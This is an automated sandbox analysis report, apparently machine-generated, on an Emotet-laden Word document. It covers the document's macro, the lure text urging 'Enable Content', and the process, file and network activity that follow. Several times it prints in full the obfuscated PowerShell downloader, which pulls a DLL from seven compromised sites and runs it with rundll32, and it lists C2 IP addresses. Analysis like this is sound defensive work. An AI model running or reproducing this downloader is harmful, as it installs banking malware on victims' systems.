Source: global traffic HTTP traffic detected: GET /xlgRAUoKyrAaNnNNtTN HTTP/1.1 Cookie: ZY=3bqR+TDsaw4ISdWheUyZ7+BfZlZm+32bzB+7wtiUWoH9C2gCIryiUl5WAuzJJ5ea6QzyqPEJC6DkwnmwNMb1gk+5A5+cWtbxEcALOy2S4QOQeBpgllr+1+8qRlVVSCJHihVyjR1uqZYCjlCPhmlt/vgDWvzkZJKX+QeR1swdnldI9zpydTmZKXkHoCqWfX3Fqy4OkZd9TUhFwIMLga3/5XfS1ABqmPK7bE/sm3JzQyUjLj4a0GGjw2XmDsZNEYJSFzVD0W/PKResRLsLDUuiRrmZhCw7olwx4jd6UWHq9IxVQWqR2IuMHo90DW/gDju7JXcqzlJaEv0= Host: 51.178.61.60 Connection: Keep-Alive Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /wp-content/oAx5UoQmIX3cbw/ HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1 Host: thepilatesstudionj.com Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xcyav/F9le301G89W0s2g4jLO5/ HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1 Host: alfaofarms.com Connection: Keep-Alive
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49794
Source: unknown Network traffic detected: HTTP traffic on port 49794 -> 443
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Mon, 22 Nov 2021 10:03:15 GMT Content-Type: text/html Content-Length: 162 Connection: close
Source: unknown TCP traffic detected without corresponding DNS query: 51.178.61.60
Source: unknown TCP traffic detected without corresponding DNS query: 168.197.250.14
Source: unknown TCP traffic detected without corresponding DNS query: 45.79.33.48
Source: unknown HTTPS traffic detected: 51.178.61.60:443 -> 192.168.2.5:49794 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Contains functionality for read data from the clipboard
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_615A5A30 GetOpenClipboardWindow,CloseClipboard,GetMenuCheckMarkDimensions,IsSystemResumeAutomatic, 14_2_615A5A30

E-Banking Fraud:

Yara detected Emotet
Source: Yara match File source: 21.2.rundll32.exe.30146b8.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.2.rundll32.exe.30146b8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000015.00000002.535111324.0000000002FFA000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.416130132.0000000003025000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.456337170.0000000000775000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.377988081.0000000000475000.00000004.00000020.sdmp, type: MEMORY

System Summary:

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot number: 4 Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to pcenew tms Document Page1 of 1 Owords It? O Type h
Source: Screenshot number: 4 Screenshot OCR: DOCUMENT IS PROTECTED Prenewmg os not available for protected documents You have to press "ENABLE
Source: Screenshot number: 4 Screenshot OCR: protected documents You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to pcenew tms D
Source: Screenshot number: 4 Screenshot OCR: ENABLE CONTENT" buttons to pcenew tms Document Page1 of 1 Owords It? O Type here to search m % -
Source: Screenshot number: 8 Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this docum:?i Shortcut Tools Usethese butt
Source: Screenshot number: 8 Screenshot OCR: DOCUMENT IS PROTECTED. C, Previewing is not available for protected documents. O You have to press
Source: Screenshot number: 8 Screenshot OCR: protected documents. O You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview t
Source: Screenshot number: 8 Screenshot OCR: ENABLE CONTENT" buttons to preview this docum:?i Shortcut Tools Usethese buttons to quickly custo
Source: Document image extraction number: 0 Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 0 Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
Source: Document image extraction number: 0 Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Document image extraction number: 0 Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
Powershell drops PE file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\ProgramData\13791789.dll
Document contains an embedded VBA macro which may execute processes
Source: VBA code instrumentation OLE, VBA macro: Module bvkaeiku2ncoi2uho3ihdes, Function dgfjalfhkaugwikgfuol3wgnacoi3u5taboi3ut5roai3u5go3wugaolisdrgfso8i7wejwdoljgf, API IWshShell3.Run("cmd.exe /c start /B powershell $dfkj="$strs=\"http://thepilatesstudionj.com/wp-content/oAx5UoQmIX3cbw/,http://alfaofarms.com/xcyav/F9le301G89W0s2g4jLO5/,https://staviancjs.com/wp-forum/QOm4n2/,https://yougandan.com/backup_YouGandan-9th-nov/3n6PrcuIaPCNcRU7uj7D/,http://alfadandoinc.com/67oyp/C2J2KyCpQnkK4Um/,http://www.caboturnup.com/wp-content/plugins/classic-editor/js/PZgllRH6QtkaCKtSB50rzr/,http://itomsystem.in/i9eg3y/nNxmmn9aTcv/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj",0:Integer) Name: dgfjalfhkaugwikgfuol3wgnacoi3u5taboi3ut5roai3u5go3wugaolisdrgfso8i7wejwdoljgf
Source: ~DFE2F261E3909AA4D4.TMP.0.dr OLE, VBA macro line: JbxHook_Run_2__ob = jbxthis.Run(jbxparam0, jbxparam1)
Document has an unknown application name
Source: 1711.doc OLE indicator application name: unknown
Source: ~DFE2F261E3909AA4D4.TMP.0.dr OLE indicator application name: unknown
Source: ~WRF{3FBF80BF-E144-402A-AB00-22C522DF80B7}.tmp.0.dr OLE indicator application name: unknown
Detected potential crypto function
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 16_2_0067C158 16_2_0067C158
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 16_2_0069292B 16_2_0069292B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 16_2_00676B25 16_2_00676B25
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 16_2_00675923 16_2_00675923
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 16_2_00690B34 16_2_00690B34
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 16_2_00673502 16_2_00673502
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 16_2_00672309 16_2_00672309
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 16_2_0068FD10 16_2_0068FD10
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 16_2_0067251C 16_2_0067251C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 16_2_0068BFE8 16_2_0068BFE8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 16_2_006755E8 16_2_006755E8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 16_2_006903F1 16_2_006903F1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 16_2_0067C5FE 16_2_0067C5FE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 16_2_00676FC4 16_2_00676FC4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 16_2_006925C3 16_2_006925C3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 16_2_0067A3DF 16_2_0067A3DF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 16_2_00684BAA 16_2_00684BAA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 16_2_00689DA1 16_2_00689DA1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 16_2_00682FA2 16_2_00682FA2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 16_2_0067BFB6 16_2_0067BFB6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 16_2_00687BB2 16_2_00687BB2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 16_2_0068B1B5 16_2_0068B1B5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 16_2_00679384 16_2_00679384
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 16_2_00684D8D 16_2_00684D8D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 16_2_0067758F 16_2_0067758F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 16_2_00674F8E 16_2_00674F8E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 16_2_0068D99A 16_2_0068D99A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 16_2_0067FD91 16_2_0067FD91
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 16_2_00691193 16_2_00691193
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 16_2_0068B397 16_2_0068B397
Document misses a certain OLE stream usually present in this Microsoft Office document type
Source: ~DFE2F261E3909AA4D4.TMP.0.dr OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: ~WRF{3FBF80BF-E144-402A-AB00-22C522DF80B7}.tmp.0.dr OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Abnormal high CPU Usage
Source: C:\Windows\SysWOW64\rundll32.exe Process Stats: CPU usage > 98%
Tries to load missing DLLs
Source: C:\Windows\System32\svchost.exe Section loaded: xboxlivetitleid.dll
Source: C:\Windows\System32\svchost.exe Section loaded: cdpsgshims.dll
Yara signature match
Source: C:\Users\user\AppData\Local\Temp\~DFE2F261E3909AA4D4.TMP, type: DROPPED Matched rule: SUSP_VBA_FileSystem_Access date = 2019-06-21, author = Florian Roth, description = Detects suspicious VBA that writes to disk and is activated on document open, reference = Internal Research, score = 52262bb315fa55b7441a04966e176b0e26b7071376797e35c80aa60696b6d6fc
Creates files inside the system directory
Source: C:\Windows\System32\svchost.exe File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
Found potential string decryption / allocating functions
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 615B5BE0 appears 49 times
Document contains an embedded VBA macro which executes code when the document is opened / closed
Source: 1711.doc OLE, VBA macro line: Private Sub Document_Open()
Source: VBA code instrumentation OLE, VBA macro: Module bvkaeiku2ncoi2uho3ihdes, Function Document_Open Name: Document_Open
Source: ~DFE2F261E3909AA4D4.TMP.0.dr OLE, VBA macro line: Private Function JbxHook_Open_3__ob_set(jbxline, ByRef jbxthis, ByRef jbxparam0, ByRef jbxparam1, ByRef jbxparam2)
Source: ~DFE2F261E3909AA4D4.TMP.0.dr OLE, VBA macro line: Static jbxtresh_Open As Integer
Source: ~DFE2F261E3909AA4D4.TMP.0.dr OLE, VBA macro line: If jbxtresh_Open < 200 Then
Source: ~DFE2F261E3909AA4D4.TMP.0.dr OLE, VBA macro line: Set JbxHook_Open_3__ob_set = jbxthis.Open(jbxparam0, jbxparam1, jbxparam2)
Source: ~DFE2F261E3909AA4D4.TMP.0.dr OLE, VBA macro line: If jbxtresh_Open < 200 Then
Source: ~DFE2F261E3909AA4D4.TMP.0.dr OLE, VBA macro line: jbxtresh_Open = jbxtresh_Open + 1
Source: ~DFE2F261E3909AA4D4.TMP.0.dr OLE, VBA macro line: JbxLogParam "jbxreturn", JbxHook_Open_3__ob_set
Source: ~DFE2F261E3909AA4D4.TMP.0.dr OLE, VBA macro line: Set WB = JbxHook_Open_3__ob_set(28, Workbooks, FileName, False, True)
Source: ~DFE2F261E3909AA4D4.TMP.0.dr OLE, VBA macro line: Private Sub Document_Open()
Contains functionality to call native functions
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_615A13F0 zwxnlwalmcbgmt, 14_2_615A13F0
Document contains no OLE stream with summary information
Source: 1711.doc OLE indicator has summary info: false
Source: ~DFE2F261E3909AA4D4.TMP.0.dr OLE indicator has summary info: false
Source: ~WRF{3FBF80BF-E144-402A-AB00-22C522DF80B7}.tmp.0.dr OLE indicator has summary info: false
Document contains embedded VBA macros
Source: 1711.doc OLE indicator, VBA macros: true
Source: ~DFE2F261E3909AA4D4.TMP.0.dr OLE indicator, VBA macros: true
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word
Source: classification engine Classification label: mal100.troj.expl.evad.winDOC@27/26@2/24
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE File read: C:\Users\desktop.ini
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_615AEBD0 LoadLibraryExW,LoadLibraryExW,LoadLibraryExW,FindResourceW,LoadResource,SizeofResource,MultiByteToWideChar,FreeLibrary, 14_2_615AEBD0
Source: 1711.doc OLE document summary: title field not present or empty
Source: ~DFE2F261E3909AA4D4.TMP.0.dr OLE document summary: title field not present or empty
Source: ~DFE2F261E3909AA4D4.TMP.0.dr OLE document summary: author field not present or empty
Source: ~DFE2F261E3909AA4D4.TMP.0.dr OLE document summary: edited time not present or 0
Source: ~WRF{3FBF80BF-E144-402A-AB00-22C522DF80B7}.tmp.0.dr OLE document summary: title field not present or empty
Source: ~WRF{3FBF80BF-E144-402A-AB00-22C522DF80B7}.tmp.0.dr OLE document summary: author field not present or empty
Source: ~WRF{3FBF80BF-E144-402A-AB00-22C522DF80B7}.tmp.0.dr OLE document summary: edited time not present or 0
Source: 1711.doc Virustotal: Detection: 39%
Source: 1711.doc Metadefender: Detection: 20%
Source: 1711.doc ReversingLabs: Detection: 57%
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
Source: unknown Process created: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE "C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE" /Automation -Embedding
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c start /B powershell $dfkj="$strs=\"http://thepilatesstudionj.com/wp-content/oAx5UoQmIX3cbw/,http://alfaofarms.com/xcyav/F9le301G89W0s2g4jLO5/,https://staviancjs.com/wp-forum/QOm4n2/,https://yougandan.com/backup_YouGandan-9th-nov/3n6PrcuIaPCNcRU7uj7D/,http://alfadandoinc.com/67oyp/C2J2KyCpQnkK4Um/,http://www.caboturnup.com/wp-content/plugins/classic-editor/js/PZgllRH6QtkaCKtSB50rzr/,http://itomsystem.in/i9eg3y/nNxmmn9aTcv/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell $dfkj="$strs=\"http://thepilatesstudionj.com/wp-content/oAx5UoQmIX3cbw/,http://alfaofarms.com/xcyav/F9le301G89W0s2g4jLO5/,https://staviancjs.com/wp-forum/QOm4n2/,https://yougandan.com/backup_YouGandan-9th-nov/3n6PrcuIaPCNcRU7uj7D/,http://alfadandoinc.com/67oyp/C2J2KyCpQnkK4Um/,http://www.caboturnup.com/wp-content/plugins/classic-editor/js/PZgllRH6QtkaCKtSB50rzr/,http://itomsystem.in/i9eg3y/nNxmmn9aTcv/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj
Source: unknown Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
Source: unknown Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
Source: unknown Process created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
Source: unknown Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWow64\rundll32.exe" C:\ProgramData\13791789.dll,f1158194191
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\13791789.dll",Control_RunDLL
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Pnxoind\oxhesd.gzk",OlFSBFftEbm
Source: C:\Windows\System32\svchost.exe Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Pnxoind\oxhesd.gzk",Control_RunDLL
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: C:\Windows\SysWOW64\rundll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{c53e07ec-25f3-4093-aa39-fc67ea22e99d}\InProcServer32
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE File created: C:\Users\user\AppData\Local\Temp\{E3FF1F0A-4208-4AB1-BD02-5AC59AFBF013} - OProcSessId.dat
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_615ABC70 SHGetFolderPathW,CoCreateInstance, 14_2_615ABC70
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWow64\rundll32.exe" C:\ProgramData\13791789.dll,f1158194191
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6404:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:3940:120:WilError_01
Source: C:\Windows\System32\svchost.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE File opened: C:\Windows\SysWOW64\MSVCR100.dll
Source: ~WRF{3FBF80BF-E144-402A-AB00-22C522DF80B7}.tmp.0.dr Initial sample: OLE indicators vbamacros = False

Data Obfuscation:

Suspicious powershell command line found
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell $dfkj="$strs=\"http://thepilatesstudionj.com/wp-content/oAx5UoQmIX3cbw/,http://alfaofarms.com/xcyav/F9le301G89W0s2g4jLO5/,https://staviancjs.com/wp-forum/QOm4n2/,https://yougandan.com/backup_YouGandan-9th-nov/3n6PrcuIaPCNcRU7uj7D/,http://alfadandoinc.com/67oyp/C2J2KyCpQnkK4Um/,http://www.caboturnup.com/wp-content/plugins/classic-editor/js/PZgllRH6QtkaCKtSB50rzr/,http://itomsystem.in/i9eg3y/nNxmmn9aTcv/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj
Obfuscated command line found
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c start /B powershell $dfkj="$strs=\"http://thepilatesstudionj.com/wp-content/oAx5UoQmIX3cbw/,http://alfaofarms.com/xcyav/F9le301G89W0s2g4jLO5/,https://staviancjs.com/wp-forum/QOm4n2/,https://yougandan.com/backup_YouGandan-9th-nov/3n6PrcuIaPCNcRU7uj7D/,http://alfadandoinc.com/67oyp/C2J2KyCpQnkK4Um/,http://www.caboturnup.com/wp-content/plugins/classic-editor/js/PZgllRH6QtkaCKtSB50rzr/,http://itomsystem.in/i9eg3y/nNxmmn9aTcv/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell $dfkj="$strs=\"http://thepilatesstudionj.com/wp-content/oAx5UoQmIX3cbw/,http://alfaofarms.com/xcyav/F9le301G89W0s2g4jLO5/,https://staviancjs.com/wp-forum/QOm4n2/,https://yougandan.com/backup_YouGandan-9th-nov/3n6PrcuIaPCNcRU7uj7D/,http://alfadandoinc.com/67oyp/C2J2KyCpQnkK4Um/,http://www.caboturnup.com/wp-content/plugins/classic-editor/js/PZgllRH6QtkaCKtSB50rzr/,http://itomsystem.in/i9eg3y/nNxmmn9aTcv/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_046E12A1 push es; ret 5_2_046E12B0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_615D8067 push ecx; ret 14_2_615D807A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_615B5C26 push ecx; ret 14_2_615B5C39
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 16_2_00671229 push eax; retf 16_2_0067129A
PE file contains an invalid checksum
Source: 13791789.dll.5.dr Static PE information: real checksum: 0x81586 should be: 0x7d179

Persistence and Installation Behavior:

Drops PE files to the application program directory (C:\ProgramData)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\ProgramData\13791789.dll
Drops PE files
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\ProgramData\13791789.dll
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Windows\SysWOW64\Pnxoind\oxhesd.gzk (copy)
Drops PE files to the windows directory (C:\Windows)
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Windows\SysWOW64\Pnxoind\oxhesd.gzk (copy)

Hooking and other Techniques for Hiding and Protection:

Hides that the sample has been downloaded from the Internet (zone.identifier)
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Pnxoind\oxhesd.gzk:Zone.Identifier read attributes | delete
Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_615B7C47 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 14_2_615B7C47
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Windows\System32\svchost.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
